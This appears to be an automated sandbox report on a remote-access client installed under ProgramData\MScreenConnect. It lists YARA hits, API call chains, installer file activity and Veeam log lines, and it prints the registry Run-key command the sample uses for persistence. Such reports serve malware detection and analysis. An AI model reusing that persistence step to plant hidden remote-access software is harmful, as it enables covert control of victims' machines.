Source: Yara match	File source: 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 5596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\MScreenConnect\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11108CB0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		3_2_11108CB0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11108CB0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_11108CB0

Source: C:\ProgramData\MScreenConnect\client32.exe

Process Stats: CPU usage > 49%

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_111058F0: GetKeyState,DeviceIoControl,keybd_event,

3_2_111058F0

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11085430 _memset,GetVersionExA,OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopA,SetProcessWindowStation,CloseWindowStation,SetHandleInformation,SetHandleInformation,SetHandleInformation,_memset,LoadLibraryA,GetProcAddress,IsBadReadPtr,CreateProcessAsUserA,GetProcAddress,FreeLibrary,MsgWaitForMultipleObjects,MsgWaitForMultipleObjects,PeekMessageA,DispatchMessageA,PeekMessageA,DispatchMessageA,PeekMessageA,MsgWaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetLastError,CloseDesktop,GetLastError,SetProcessWindowStation,CloseWindowStation,GetLastError,

3_2_11085430

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		3_2_1102BB50
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		6_2_1102BB50

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\519b7a.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{AA354307-EBD0-4C41-9B74-0AF1BD8AA230}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9D3F.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\519b7c.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\519b7c.msi	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\519b7c.msi

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1105D550	3_2_1105D550
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1106DED0	3_2_1106DED0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110280F0	3_2_110280F0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1110E3D0	3_2_1110E3D0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110A9340	3_2_110A9340
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11117290	3_2_11117290
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1101B5A0	3_2_1101B5A0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1114D430	3_2_1114D430
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11031430	3_2_11031430
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11043450	3_2_11043450
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11151CA0	3_2_11151CA0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11029FB0	3_2_11029FB0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11155E65	3_2_11155E65
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110AC1B0	3_2_110AC1B0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1101A340	3_2_1101A340
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11082530	3_2_11082530
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1101A780	3_2_1101A780
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11008920	3_2_11008920
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1104CBF0	3_2_1104CBF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1107ADC0	3_2_1107ADC0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1106AC40	3_2_1106AC40
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110A8E30	3_2_110A8E30
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_6CC690A0	3_2_6CC690A0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1105D550	6_2_1105D550
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11117290	6_2_11117290
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1101B5A0	6_2_1101B5A0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1114D430	6_2_1114D430
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11031430	6_2_11031430
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11043450	6_2_11043450
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11151CA0	6_2_11151CA0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11029FB0	6_2_11029FB0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11155E65	6_2_11155E65
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1106DED0	6_2_1106DED0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110280F0	6_2_110280F0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1101A340	6_2_1101A340
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11082530	6_2_11082530
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1101A780	6_2_1101A780
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11008920	6_2_11008920
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1104CBF0	6_2_1104CBF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1107ADC0	6_2_1107ADC0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1106AC40	6_2_1106AC40

Source: C:\ProgramData\MScreenConnect\client32.exe

Process token adjusted: Security

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 1107C4F0 appears 84 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 111524F0 appears 66 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 111356E0 appears 1159 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 11135EC0 appears 44 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 11027FB0 appears 2033 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 110596B0 appears 52 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 1114EE63 appears 92 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 1115D9F0 appears 74 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 11026600 appears 92 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 11059580 appears 572 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 110AE510 appears 37 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 11095C10 appears 32 times
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: String function: 11161E0D appears 40 times

Source: wfapigp.dll.1.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: winrsmgr.dll.1.dr	Static PE information: No import functions for PE file found
Source: icmp.dll.1.dr	Static PE information: No import functions for PE file found
Source: msvcr100_clr0400.dll.1.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe"

Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.924] [1db0:14c8: 00] DETAIL: VS_PS: process creation: 1b7c, parent = 1db0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.004] [1c80:14ec: 00] DETAIL: VS_PS: process creation: 5b4, parent = 1c80, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:20.070] [2028:18c8: 00] DETAIL: VS_PS: process creation: 1e64, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:02.038] [1f14:45c: 00] DETAIL: VS_PS: process termination: 1f14, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.312] [340:23c0: 00] DETAIL: VS_PS: process creation: 2268, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\MoUsoCoreWorker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.429] [1a9c:6a4: 00] DETAIL: VS_PS: process creation: 1b0, parent = 1a9c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:57.378] [2b8:1064: 00] DETAIL: VS_PS: process creation: 152c, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\vds.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.593] [1a90:84c: 00] DETAIL: VS_PS: process termination: 1a90, image filename: "\Device\HarddiskVolume2\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3684_none_7dfc270e7c9a3a0b\TiWorker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:47.471] [1b04:1a20: 00] DETAIL: VS_PS: process termination: 1b04, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.420] [b74:1514: 00] DETAIL: VS_PS: process termination: b74, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.406] [1ab4:ea8: 00] DETAIL: VS_PS: process termination: 1ab4, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.928] [16b4:41c: 00] DETAIL: VS_PS: process termination: 16b4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:19.106] [10bc:22b4: 00] DETAIL: VS_PS: process termination: 10bc, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:16.613] [1444:1130: 00] DETAIL: VS_PS: process termination: 1444, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.159] [c10:588: 00] DETAIL: VS_PS: process creation: 201c, parent = c10, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.549] [2c0:2148: 00] DETAIL: VS_PS: process creation: 1aac, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.308] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 10bc, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.062] [1574:1838: 00] DETAIL: VS_PS: process termination: 1574, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.181] [e84:2a8: 00] DETAIL: VS_PS: process termination: e84, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:10:47.432] [a34:157c: 00] DETAIL: VS_PS: process termination: a34, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:24.073] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1950, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.073] [1950:1110: 00] DETAIL: VS_PS: process creation: 11c0, parent = 1950, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.921] [1290:12a0: 00] DETAIL: VS_PS: process termination: 1290, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:37.488] [450:b7c: 00] DETAIL: VS_PS: process termination: 450, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:36.072] [82c:1ac0: 00] DETAIL: VS_PS: process termination: 82c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:08.525] [1bb8:9e4: 00] DETAIL: VS_PS: process termination: 1bb8, image filename: "\Device\HarddiskVolume2\Windows\System32\RuntimeBroker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:34.158] [1798:7e8: 00] DETAIL: VS_PS: process termination: 1798, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.400] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1b60, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.336] [1aa4:1e98: 00] DETAIL: VS_PS: process creation: ad4, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.125] [187c:f20: 00] DETAIL: VS_PS: process termination: 187c, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.922] [188:448: 00] DETAIL: VS_PS: process termination: 188, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.506] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 18e4, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:05.827] [e7c:11fc: 00] DETAIL: VS_PS: process termination: e7c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.141] [1890:2118: 00] DETAIL: VS_PS: process termination: 1890, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:14.844] [21e4:b14: 00] DETAIL: VS_PS: process termination: 21e4, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.574] [5e4:14e4: 00] DETAIL: VS_PS: process termination: 5e4, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.592] [1314:c44: 00] DETAIL: VS_PS: process termination: 1314, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.508] [13e8:eac: 00] DETAIL: VS_PS: process termination: 13e8, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamGuestHelperCtrl.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.972] [780:230c: 00] DETAIL: VS_PS: process termination: 780, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:24.274] [1b60:b50: 00] DETAIL: VS_PS: process termination: 1b60, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:34.963] [109c:2348: 00] DETAIL: VS_PS: process termination: 109c, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:28.857] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1c80, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.981] [1ab4:ea0: 00] DETAIL: VS_PS: process creation: a44, parent = 1ab4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.112] [fc0:378: 00] DETAIL: VS_PS: process creation: 1d14, parent = fc0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.174] [d24:430: 00] DETAIL: VS_PS: process termination: d24, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:41.126] [494:1878: 00] DETAIL: VS_PS: process termination: 494, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:01.028] [1478:235c: 00] DETAIL: VS_PS: process termination: 1478, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:36.067] [f04:1c84: 00] DETAIL: VS_PS: process termination: f04, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:13:12.277] [340:370: 00] DETAIL: VS_PS: process creation: 1874, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.939] [2394:23b0: 00] DETAIL: VS_PS: process creation: 2174, parent = 2394, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:10.231] [3d4:734: 00] DETAIL: VS_PS: process termination: 3d4, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:59.267] [1a74:16b8: 00] DETAIL: VS_PS: process termination: 1a74, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.792] [2c0:e98: 00] DETAIL: VS_PS: process creation: 188, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:46.922] [1a1c:1708: 00] DETAIL: VS_PS: process termination: 1a1c, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:33.906] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1c44, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.602] [2c0:2148: 00] DETAIL: VS_PS: process creation: fcc, parent = 2c0, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamPSDirectCtrl_X64.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.125] [16c4:fac: 00] DETAIL: VS_PS: process creation: 1890, parent = 16c4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.912] [eb8:15fc: 00] DETAIL: VS_PS: process termination: eb8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:39.684] [2b8:1064: 00] DETAIL: VS_PS: process creation: 1e2c, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.653] [1110:1588: 00] DETAIL: VS_PS: process termination: 1110, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.445] [2c0:225c: 00] DETAIL: VS_PS: process creation: 13e8, parent = 2c0, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamGuestHelperCtrl.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:53.935] [340:370: 00] DETAIL: VS_PS: process creation: 1ddc, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:08.505] [9dc:8bc: 00] DETAIL: VS_PS: process termination: 9dc, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:34.738] [20dc:b70: 00] DETAIL: VS_PS: process termination: 20dc, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.853] [340:23c0: 00] DETAIL: VS_PS: process creation: 1fa4, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.988] [cc4:7f4: 00] DETAIL: VS_PS: process termination: cc4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.842] [16c0:2180: 00] DETAIL: VS_PS: process termination: 16c0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.850] [b04:974: 00] DETAIL: VS_PS: process termination: b04, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:14.602] [1bd0:730: 00] DETAIL: VS_PS: process termination: 1bd0, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:03.640] [22b8:1ab4: 00] DETAIL: VS_PS: process termination: 22b8, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.102] [340:23c0: 00] DETAIL: VS_PS: process creation: 8bc, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\RuntimeBroker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:43.925] [1608:1d98: 00] DETAIL: VS_PS: process termination: 1608, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:59.429] [1f60:82c: 00] DETAIL: VS_PS: process termination: 1f60, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.754] [9c0:1ba4: 00] DETAIL: VS_PS: process termination: 9c0, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.512] [18e4:f4c: 00] DETAIL: VS_PS: process creation: 624, parent = 18e4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:46.969] [340:13a4: 00] DETAIL: VS_PS: process creation: 1d04, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.527] [99c:1bc0: 00] DETAIL: VS_PS: process termination: 99c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:13:04.292] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1fd4, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.802] [23ec:5d4: 00] DETAIL: VS_PS: process termination: 23ec, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.533] [1f08:23a8: 00] DETAIL: VS_PS: process termination: 1f08, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:10:33.720] [1e00:1844: 00] DETAIL: VS_PS: process creation: ea8, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:26.737] [1040:29c: 00] DETAIL: VS_PS: process creation: 16a8, parent = 1040, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\mofcomp.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.092] [22bc:17b4: 00] DETAIL: VS_PS: process termination: 22bc, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\mofcomp.exe".
